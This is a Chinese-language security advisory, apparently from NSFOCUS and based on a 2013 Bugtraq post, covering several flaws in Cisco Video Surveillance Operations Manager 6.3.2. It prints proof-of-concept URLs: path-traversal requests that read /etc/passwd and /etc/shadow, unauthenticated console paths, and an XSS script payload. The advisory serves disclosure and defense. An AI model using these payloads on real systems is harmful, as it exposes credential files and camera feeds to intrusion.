安全研究

安全漏洞
Cisco Video Surveillance Operations Manager多个安全漏洞

发布日期:2013-03-13
更新日期:2013-03-14

受影响系统:
Cisco Video Surveillance Operations Manager 6.3.2
描述:
BUGTRAQ  ID: 58476

Cisco Video Surveillance Operations Manager是企业级视频配置和管理解决方案。

Cisco Video Surveillance Operations Manager 6.3.2及其他版本在实现上存在多个本地文件包含漏洞、安全绕过漏洞、多个跨站脚本漏洞,攻击者可利用这些漏洞绕过某些安全限制以执行未授权操作、在浏览器中执行任意脚本代码、窃取cookie身份验证凭证、在受影响应用上下文中打开或运行任意文件。

1、本地文件包含漏洞:

read_log.jsp和read_log.dep没有验证日志文件的名称和位置,未经身份验证的远程攻击者可执行下面的脚本:

---------------------------------------------
read_log.jsp:
/usr/BWhttpd/root/htdocs/BWT/utils/logs
from /usr/BWhttpd/logs/<%= logName %>
---------------------------------------------
---------------------------------------------
read_log.dep

<%!
protected LinkedList getBwhttpdLog( String logName, String theOrder ) {
               String logPath  = "/usr/BWhttpd/logs/";
               String theLog   = logPath + logName;
               LinkedList resultList = new LinkedList();
               try {
BufferedReader in = new BufferedReader(new FileReader(theLog));
                               String theLine = "";
while( (theLine = in.readLine()) != null ) { if( theOrder.indexOf("descending") > -1 ) { resultList.addFirst

(theLine);
                                               } else {
resultList.addLast(theLine);
                                               }
                                       }
-----------------------------------------------
POC:

http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/passwd
http://serverip/BWT/utils/logs/read_log.jsp?filter=&log=../../../../../../../../../etc/shadow


2、本地文件包含漏洞:

select和display日志没有验证日志文件名,如果攻击者通过http post 请求绕过/etc/passwd,系统会将其显示为日志文件。

POC:

http://serverip/monitor/logselect.php

3、Cisco Video Surveillance Operations Manager Version 6.3.2没有对management和view控制台执行正确的身份验证,远程攻击者可不经身份验证访问系统并查看附带的摄像机。

POC:

http://serverip/broadware.jsp

4、XSS漏洞:

Web应用没有对多数页面执行输入和输出检查,存在XSS攻击漏洞。

POC: http://serverip/vsom/index.php/"/title><script>alert("ciscoxss");</script>

<*来源:b.saleh
  
  链接:http://seclists.org/bugtraq/2013/Mar/79
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&amp;amp;log=../../../../../../../../../etc/passwd
http://www.example.com/BWT/utils/logs/read_log.jsp?filter=&amp;amp;log=../../../../../../../../../etc/shadow
http://www.example.com/monitor/logselect.php
http://www.example.com/broadware.jsp
http://www.example.com/vsom/index.php/&quot;/title&amp;gt;&amp;lt;script&amp;gt;alert

(&quot;ciscoxss&quot;);&amp;lt;/script&amp;gt;

建议:
厂商补丁:

Cisco
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.cisco.com/en/US/products/ps9153/index.html

浏览次数:4732
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障